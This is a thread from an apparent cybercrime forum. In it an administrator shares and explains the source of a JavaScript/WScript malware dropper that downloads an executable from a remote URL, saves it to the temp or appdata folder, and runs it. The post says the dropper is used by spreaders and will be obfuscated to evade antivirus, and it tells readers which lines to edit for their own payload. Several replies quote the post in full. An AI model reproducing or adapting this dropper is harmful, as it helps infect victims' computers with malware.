👋 Welcome to Our Community!

Connect, share insights, and earn credits while following our community guidelines.
Advertising and Pakistan-related data are strictly prohibited and we do not host a trading platform.
Upgrade your profile for unrestricted access and explore the "Help" section for rules and tips.

From Cracking, Stealer logs, ULP, Database, Clouds, Mail Access, Spamming, Carding, and Hacking — we've got it all.
Everything you need, all in one place.

Malware Simple Malware JS Dropper Source Code | evil-zone.org | 2024

For Malware Discussion
Anony

Anony

Administrator
Member
Joined
Jun 2, 2024
Messages
4,395
Reaction score
1,218
Points
113
Location
Planet Mars
Website
evilzones.com
X Coines
16,777
Crypto
0

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


To view the content, you need to Sign In or Register.
To view the content, you need to Sign In or Register.

 
Last edited by a moderator:
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
wow
 
H
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
I
 
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
ok
 
You must log in or register to reply here.

63,340
Threads
105,155
Messages
3,931
Members
Fadda823
Latest member
Back
Top